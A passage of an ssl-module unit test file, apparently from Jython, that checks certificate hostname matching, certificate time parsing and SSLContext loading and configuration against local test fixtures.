'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = u'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
        # wildcard in first fragment and IDNA A-labels in subsequent fragments
        # are supported.
idna = u'www*.pythön.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, u'www.pythön.org'.encode("idna").decode("ascii"))
ok(cert, u'www1.pythön.org'.encode("idna").decode("ascii"))
fail(cert, u'ftp.pythön.org'.encode("idna").decode("ascii"))
fail(cert, u'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.com'),),)}
ok(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b.co*'),),)}
fail(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b*.com'),),)}
with self.assertRaises(ssl.CertificateError) as cm:
ssl.match_hostname(cert, 'axxbxxc.com')
self.assertIn("too many wildcards", str(cm.exception))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with closing(socket.socket()) as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.socket(socket.AF_INET)
with closing(ssl.wrap_socket(s)) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with closing(ssl.wrap_socket(s)) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with closing(ssl.wrap_socket(s, server_side=True, certfile=CERTFILE)) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (set, bool))
if isinstance(trust, set):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
# TODO Jython better asn1 support, though not sure there's much use for it
# val = ssl._ASN1Object.fromnid(129)
# self.assertEqual(val, expected)
# self.assertIsInstance(val, ssl._ASN1Object)
# self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
# with self.assertRaisesRegexp(ValueError, "unknown NID 100000"):
# ssl._ASN1Object.fromnid(100000)
# for i in range(1000):
# try:
# obj = ssl._ASN1Object.fromnid(i)
# except ValueError:
# pass
# else:
# self.assertIsInstance(obj.nid, int)
# self.assertIsInstance(obj.shortname, str)
# self.assertIsInstance(obj.longname, str)
# self.assertIsInstance(obj.oid, (str, type(None)))
#
# val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
# self.assertEqual(val, expected)
# self.assertIsInstance(val, ssl._ASN1Object)
# self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
# self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
# expected)
# with self.assertRaisesRegexp(ValueError, "unknown object 'serverauth'"):
# ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
ssl.wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
        # no special treatment for the special value:
# 99991231235959Z (rfc 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
class ContextTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_constructor(self):
for protocol in PROTOCOLS:
ssl.SSLContext(protocol)
self.assertRaises(TypeError, ssl.SSLContext)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
@skip_if_broken_ubuntu_ssl
def test_protocol(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.protocol, proto)
@unittest.skipIf(support.is_jython, "Currently not supported")
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegexp(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@skip_if_broken_ubuntu_ssl
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
self.assertEqual(ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3,
ctx.options)
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3 | ssl.OP_NO_TLSv1,
ctx.options)
if can_clear_options():
ctx.options = (ctx.options & ~ssl.OP_NO_SSLv2) | ssl.OP_NO_TLSv1
self.assertEqual(ssl.OP_ALL | ssl.OP_NO_TLSv1 | ssl.OP_NO_SSLv3,
ctx.options)
ctx.options = 0
self.assertEqual(0, ctx.options)
else:
with self.assertRaises(ValueError):
ctx.options = 0
def test_verify_mode(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
if support.get_java_version() < (9,):
# FIXME: Fails on Java 9+. See b.j.o. issue #2710. A similar issue is seen in
# test_errors. CERTFILE as generated uses RSA 1024, which is considered too weak.
# This may be why this raises an error on Java 9:
# java.security.KeyStoreException: Key protection algorithm not found:
# java.security.KeyStoreException: Certificate chain is not valid
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(IOError) as cm:
ctx.load_cert_chain(WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaisesRegexp(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegexp(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegexp(ValueError, "cannot be longer"):
# openssl has a fixed limit on the password buffer.
# PEM_BUFSIZE is generally set to 1kb.
# Return a string larger than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegexp(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegexp(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegexp(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
ctx.load_verify_locations(cafile=BYTES_CERTFILE.decode('utf-8'))
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(IOError) as cm:
ctx.load_verify_locations(WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(IOError):
ctx.load_verify_locations(u'')
with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read().decode("ascii")
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read().decode("ascii")
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegexp(ssl.SSLError, "no start line"):
ctx.load_verify_locations(cadata=u"broken")
with self.assertRaisesRegexp(ssl.SSLError, "not enough data"):
ctx.load_verify_locations(cadata=b"broken")
@unittest.skipIf(support.is_jython, "Not yet supported on Jython")
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(IOError) as cm:
ctx.load_dh_params(WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
@skip_if_broken_ubuntu_ssl
def test_session_stats(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
@needs_sni
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
@needs_sni
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
        # Jython's x509 count will grow by 1 while OpenSSL's remains 0
        # TODO investigate further
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 2})
ctx.load_verify_locations(REMOTE_ROOT_CERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but CAFILE_CACERT is a CA cert
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.get_ca_certs(),
[{'version': 3,
'serialNumber': 0L,
'subject': ((('emailAddress', 'support@cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('organizationName', 'Root CA'),)),
'notBefore': 'Mar 30 12:29:49 2003 GMT',
'issuer': ((('emailAddress', 'support@cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('organizationName', 'Root CA'),)),
'notAfter': 'Mar 29 12:29:49 2033 GMT'}])
# FIXME not currently collecting this aspect of the certificate
# 'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
#
# see this sample code on how we might be able to decode:
# https://svn.apache.org/repos/asf/cxf/tags/cxf-2.4.4/distribution/src/main/release/samples/sts_issue_operation/src/main/java/demo/sts/provider/cert/CRLVerifier.java
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 4, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
# self.assertEqual(
# ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
# getattr(ssl, "OP_NO_COMPRESSION", 0),
# )
with open(SIGNING_CA) as f:
cadata = f.read().decode("ascii")
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
# self.assertEqual(
# ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
# getattr(ssl, "OP_NO_COMPRESSION", 0),
# )
